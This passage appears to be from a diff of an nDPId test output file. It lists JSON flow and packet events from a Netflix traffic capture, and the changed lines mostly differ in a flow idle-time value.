-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043013,"flow_last_seen":1484319043013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043013,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1484319043013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043013,"pkt":"gCqoTGHM5JjWH70UCABFAABAkrpAAEAGYhvAqAEHuBnMGc+dAFDU44WRAAAAALAC\/\/\/IugAAAgQFtAEDAwUBAQgKH2TemAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz5xwDCo3tiBZg6AScSDeBAAAAgQFtAQCCAr\/\/DsdH2TelwEDAwU="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz53Qk2dE1OOFkqAScSD1lgAAAgQFtAQCCAr\/\/DsiH2TemAEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1484319043041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043041,"pkt":"gCqoTGHM5JjWH70UCABFAAA0zhNAAEAGJs7AqAEHuBnMGc+cAFC2IFmDcAwqOIAQEBVtuwAAAQEICh9k3rb\/\/Dsd"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1484319043042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043042,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UPZAAEAGo+vAqAEHuBnMGc+dAFDU44WS0JNnRYAQEBWFTgAAAQEICh9k3rb\/\/Dsi"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043665,"flow_last_seen":1484319043665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1484319043665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043665,"pkt":"gCqoTGHM5JjWH70UCABFAABAaV9AAEAGi3bAqAEHuBnMGc+eAFByPGEHAAAAALAC\/\/9NegAAAgQFtAEDAwUBAQgKH2ThCQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1484319043688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043688,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz57u7DQucjxhCKAScSCMigAAAgQFtAQCCAr\/\/D2rH2ThCQEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1484319043689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043689,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VAZAAEAGoNvAqAEHuBnMGc+eAFByPGEI7uw0L4AQEBUcSAAAAQEICh9k4SH\/\/D2r"} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1484319044993,"pkt":"gCqoTGHM5JjWH70UCABFAAAoz5tAAEAGHmfAqAEHNBhXBs7BAbvkIOdlTYzTZlAUEACWDAAAAAAAAAAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043012,"flow_last_seen":1484319043012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043012,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1484319043012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043012,"pkt":"gCqoTGHM5JjWH70UCABFAABA10xAAEAGHYnAqAEHuBnMGc+cAFC2IFmCAAAAALAC\/\/8TjwAAAgQFtAEDAwUBAQgKH2TelwAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043013,"flow_last_seen":1484319043013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043013,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1484319043013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043013,"pkt":"gCqoTGHM5JjWH70UCABFAABAkrpAAEAGYhvAqAEHuBnMGc+dAFDU44WRAAAAALAC\/\/\/IugAAAgQFtAEDAwUBAQgKH2TemAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz5xwDCo3tiBZg6AScSDeBAAAAgQFtAQCCAr\/\/DsdH2TelwEDAwU="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz53Qk2dE1OOFkqAScSD1lgAAAgQFtAQCCAr\/\/DsiH2TemAEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1484319043041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043041,"pkt":"gCqoTGHM5JjWH70UCABFAAA0zhNAAEAGJs7AqAEHuBnMGc+cAFC2IFmDcAwqOIAQEBVtuwAAAQEICh9k3rb\/\/Dsd"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1484319043042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043042,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UPZAAEAGo+vAqAEHuBnMGc+dAFDU44WS0JNnRYAQEBWFTgAAAQEICh9k3rb\/\/Dsi"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043665,"flow_last_seen":1484319043665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1484319043665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043665,"pkt":"gCqoTGHM5JjWH70UCABFAABAaV9AAEAGi3bAqAEHuBnMGc+eAFByPGEHAAAAALAC\/\/9NegAAAgQFtAEDAwUBAQgKH2ThCQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1484319043688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043688,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz57u7DQucjxhCKAScSCMigAAAgQFtAQCCAr\/\/D2rH2ThCQEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1484319043689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043689,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VAZAAEAGoNvAqAEHuBnMGc+eAFByPGEI7uw0L4AQEBUcSAAAAQEICh9k4SH\/\/D2r"} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1484319044993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1484319044993,"pkt":"gCqoTGHM5JjWH70UCABFAAAoz5tAAEAGHmfAqAEHNBhXBs7BAbvkIOdlTYzTZlAUEACWDAAAAAAAAAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1484319048757,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1484319048757,"pkt":"gCqoTGHM5JjWH70UCABFAABBS2MAAP8R7O\/AqAEHwKgBAeL2ADUALZ5c\/mQBAAABAAAAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAQ=="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1484319048776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1484319048776,"pkt":"5JjWH70UgCqoTGHMCABFAACy4UZAAEAR1ZvAqAEBwKgBBwA14vYAnkKZ\/mSBgAABAAUAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAcAMAAUAAQAAAG0ADgdhcHBib290A2dlb8AUwDEABQABAAABawAbB2FwcGJvb3QJdXMtd2VzdC0yBnByb2RhYcAUwEsAAQABAAAACwAENsm\/hMBLAAEAAQAAAAsABDQr9VrASwABAAEAAAALAAQ0GfQx"} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048780,"flow_last_seen":1484319048780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319048780,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1484319048780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319048780,"pkt":"gCqoTGHM5JjWH70UCABFAABAtrNAAEAGzAfAqAEHNsm\/hM+fAFA6e8d6AAAAALAC\/\/+ZMQAAAgQFtAEDAwUBAQgKH2T0hAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1484319048824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319048824,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGmJ82yb+EwKgBBwBQz59tgW\/FOnvHe6ASRep1DwAAAgQFtAQCCApXXrqDH2T0hAEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1484319048826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319048826,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VQxAAEAGLbvAqAEHNsm\/hM+fAFA6e8d7bYFvxoAQEBXZhAAAAQEICh9k9LFXXrqD"} -00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049465,"flow_last_seen":1484319049465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049465,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1484319049465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049465,"pkt":"gCqoTGHM5JjWH70UCABFAABAjtZAAEAGjk7AqAEHNFkni8+gAFCVL\/AiAAAAALAC\/\/+toQAAAgQFtAEDAwUBAQgKH2T3IAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1484319049510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049510,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwBQz6CC\/YxQlS\/wI6ASRerkyQAAAgQFtAQCCAqtiNcHH2T3IAEDAwg="} 